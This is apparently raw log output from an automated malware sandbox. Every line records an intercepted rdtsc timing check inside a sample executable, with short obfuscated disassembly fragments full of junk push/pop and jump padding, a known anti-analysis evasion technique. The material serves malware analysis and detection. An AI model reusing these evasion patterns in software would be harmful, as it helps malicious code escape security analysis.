                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B7029 second address: 3B703F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4082h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B719B second address: 3B719F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B72FB second address: 3B7303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B7303 second address: 3B7309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B7309 second address: 3B730D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33CFA5 second address: 33CFCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33CFCB second address: 33CFEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4086h 0x00000007 jmp 00007F3A94CD407Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3BF90C second address: 3BF930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3BF930 second address: 3BF936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3BF936 second address: 3BF980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F0h 0x00000009 popad 0x0000000a jp 00007F3A9502B5F2h 0x00000010 push ecx 0x00000011 jmp 00007F3A9502B5EEh 0x00000016 jmp 00007F3A9502B5EEh 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37827E second address: 3604AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 stc 0x0000000a call dword ptr [ebp+122D2272h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37832B second address: 378331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 378331 second address: 378336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37878F second address: 3787AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 378923 second address: 37892E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37892E second address: 378991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 pushad 0x00000011 jmp 00007F3A9502B5EEh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c jg 00007F3A9502B602h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jl 00007F3A9502B5E6h 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 378991 second address: 3789DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A94CD4089h 0x0000000b popad 0x0000000c pop eax 0x0000000d mov ecx, 6DD6FF35h 0x00000012 push D0022165h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F3A94CD408Eh 0x0000001f jmp 00007F3A94CD4088h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3789DC second address: 3789E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F3A9502B5E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 378ADF second address: 378AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 378E29 second address: 378E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3A9502B5E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 379192 second address: 37919D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3A94CD4076h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37919D second address: 3791B0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A9502B5E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3791B0 second address: 3791B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3791B4 second address: 3791D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3791D1 second address: 3791D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3791D7 second address: 3791DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37959D second address: 360F8A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A94CD4078h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F3A94CD407Ah 0x00000011 nop 0x00000012 mov cx, si 0x00000015 call dword ptr [ebp+122D192Fh] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jo 00007F3A94CD4076h 0x00000024 jo 00007F3A94CD4076h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C000B second address: 3C000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C000F second address: 3C0019 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3A94CD4076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C0019 second address: 3C0022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C0022 second address: 3C0040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3A94CD4080h 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C0040 second address: 3C0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C0046 second address: 3C005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jng 00007F3A94CD40A9h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jc 00007F3A94CD4076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C005F second address: 3C0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C0068 second address: 3C006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C01B8 second address: 3C01BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C030E second address: 3C031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007F3A94CD4076h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C031C second address: 3C0325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C0325 second address: 3C032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C032B second address: 3C0348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C0348 second address: 3C034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C2F93 second address: 3C2FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A9502B5F1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F3A9502B5E6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C2FB5 second address: 3C2FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C2FB9 second address: 3C2FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C2B1F second address: 3C2B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C2B23 second address: 3C2B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F3A9502B5F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C2B41 second address: 3C2B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3A94CD4076h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C2B4B second address: 3C2B5C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3A9502B5ECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C5A8C second address: 3C5A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C5A90 second address: 3C5AD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A9502B5F2h 0x0000000c jp 00007F3A9502B5E6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 jns 00007F3A9502B5F9h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3C5AD2 second address: 3C5AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 jmp 00007F3A94CD407Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3CCA32 second address: 3CCA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3CCA36 second address: 3CCAA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3A94CD407Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F3A94CD408Ah 0x00000011 jmp 00007F3A94CD407Ah 0x00000016 jmp 00007F3A94CD407Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3A94CD4088h 0x00000023 pushad 0x00000024 jns 00007F3A94CD4076h 0x0000002a jmp 00007F3A94CD4080h 0x0000002f jmp 00007F3A94CD407Fh 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37900A second address: 379031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F3A9502B5E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F3A9502B5F6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D033A second address: 3D0340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D0340 second address: 3D0344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D0344 second address: 3D0377 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A94CD4089h 0x0000000d jmp 00007F3A94CD4082h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D0377 second address: 3D037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D04D2 second address: 3D04FA instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F3A94CD4078h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D04FA second address: 3D053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F5h 0x00000007 jmp 00007F3A9502B5EFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F3A9502B602h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 jg 00007F3A9502B5E6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D3DCC second address: 3D3DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D3DD0 second address: 3D3DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D3DDF second address: 3D3E1B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A94CD408Eh 0x00000008 jmp 00007F3A94CD4085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D405E second address: 3D4078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A9502B5F0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3D4078 second address: 3D407C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DB0AE second address: 3DB0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3A9502B5ECh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DB785 second address: 3DB78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DBD01 second address: 3DBD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DC00A second address: 3DC018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F3A94CD4076h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DC2F2 second address: 3DC308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DC5F8 second address: 3DC616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A94CD4089h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DCC0B second address: 3DCC0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DCC0F second address: 3DCC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3DCC17 second address: 3DCC2B instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A9502B5EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jns 00007F3A9502B5E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E01B2 second address: 3E01DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jg 00007F3A94CD407Ch 0x0000000d jne 00007F3A94CD4076h 0x00000013 jnc 00007F3A94CD4078h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007F3A94CD4076h 0x00000024 jns 00007F3A94CD4076h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E01DE second address: 3E01F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F3A9502B5F0h 0x0000000e pop edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E04BF second address: 3E04C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E04C5 second address: 3E04EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3A9502B5E6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jne 00007F3A9502B5F3h 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F3A9502B5E6h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E04EF second address: 3E0503 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F3A94CD4076h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E07A3 second address: 3E07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E07A7 second address: 3E07C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F3A94CD4080h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E08F2 second address: 3E0912 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5EEh 0x00000011 jno 00007F3A9502B5E6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E0912 second address: 3E0935 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4083h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E0935 second address: 3E093E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3E0A7D second address: 3E0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3ED888 second address: 3ED892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EBB83 second address: 3EBB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
